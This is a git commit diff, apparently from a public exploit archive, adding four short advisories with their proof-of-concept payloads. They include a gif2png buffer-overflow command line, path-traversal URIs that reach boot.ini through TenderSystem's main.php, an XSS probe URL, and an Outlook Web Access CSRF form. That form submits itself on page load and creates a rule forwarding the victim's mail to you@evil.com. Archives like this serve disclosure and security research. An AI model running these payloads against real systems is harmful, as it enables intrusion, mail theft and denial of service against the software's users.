Updated 08_19_2014
This commit is contained in:
parent
7fc5a86ea9
commit
3500985540
5 changed files with 54 additions and 0 deletions
|
@ -30940,3 +30940,7 @@ id,file,description,date,author,platform,type,port
|
|||
34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
|
||||
34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
|
||||
34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
|
||||
34354,platforms/php/webapps/34354.txt,"TenderSystem 0.9.5 'main.php' Multiple Local File Include Vulnerabilities",2009-12-14,Packetdeath,php,webapps,0
|
||||
34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 Remote Buffer Overflow Vulnerability",2009-12-12,"Razuel Akaharnath",linux,dos,0
|
||||
34357,platforms/php/webapps/34357.txt,"ScriptsEz Ez FAQ Maker 1.0 Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2009-12-15,"Milos Zivanovic ",php,webapps,0
|
||||
34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 Cross Site Request Forgery Vulnerability",2010-07-20,anonymous,windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
9
platforms/linux/dos/34356.txt
Executable file
9
platforms/linux/dos/34356.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41801/info
|
||||
|
||||
gif2png is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
|
||||
|
||||
Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
|
||||
|
||||
gif2png 2.5.2 is vulnerable; other versions may also be affected.
|
||||
|
||||
$> ./gif2png $(perl -e 'print "A" x 1053')
|
13
platforms/php/webapps/34354.txt
Executable file
13
platforms/php/webapps/34354.txt
Executable file
|
@ -0,0 +1,13 @@
|
|||
source: http://www.securityfocus.com/bid/41792/info
|
||||
|
||||
TenderSystem is prone to a multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
|
||||
|
||||
TenderSystem 0.9.5 Beta is vulnerable.
|
||||
|
||||
The following example URI's are available:
|
||||
|
||||
http://www.example.com/tendersystem/main.php?module=../../../../../../../../boot.ini%00.html&function=login
|
||||
|
||||
http://www.example.com/tendersystem/main.php?module=session&function=../../../../../../../../boot.ini%00.html
|
9
platforms/php/webapps/34357.txt
Executable file
9
platforms/php/webapps/34357.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
source: http://www.securityfocus.com/bid/41806/info
|
||||
|
||||
ScriptsEz Ez FAQ Maker is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.
|
||||
|
||||
An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.
|
||||
|
||||
Ez FAQ Maker 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
http://www.example.com/faq/index.php?action=showcat&cid=8&sid="[XSS]
|
19
platforms/windows/dos/34359.html
Executable file
19
platforms/windows/dos/34359.html
Executable file
|
@ -0,0 +1,19 @@
|
|||
source: http://www.securityfocus.com/bid/41843/info
|
||||
|
||||
Microsoft Outlook Web Access for Exchange Server 2003 is prone to a cross-site request-forgery vulnerability.
|
||||
|
||||
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
|
||||
|
||||
<form name="xsrf" action="http://www.example.com/Exchange/victim_id" method="post" target="_self">
|
||||
<input type="hidden" name="cmd" value="saverule">
|
||||
<input type="hidden" name="rulename" value="evilrule">
|
||||
<input type="hidden" name="ruleaction" value="3">
|
||||
<input type="hidden" name="forwardtocount" value="1">
|
||||
<input type="hidden" name="forwardtoname" value="guy, bad">
|
||||
<input type="hidden" name="forwardtoemail" value="you@evil.com">
|
||||
<input type="hidden" name="forwardtotype" value="SMTP">
|
||||
<input type="hidden" name="forwardtoentryid" value="">
|
||||
<input type="hidden" name="forwardtosearchkey" value="">
|
||||
<input type="hidden" name="forwardtoisdl" value="">
|
||||
<input type="hidden" name="keepcopy" value="1">
|
||||
<body onload="document.forms.xsrf.submit();">
|
Loading…
Add table
Reference in a new issue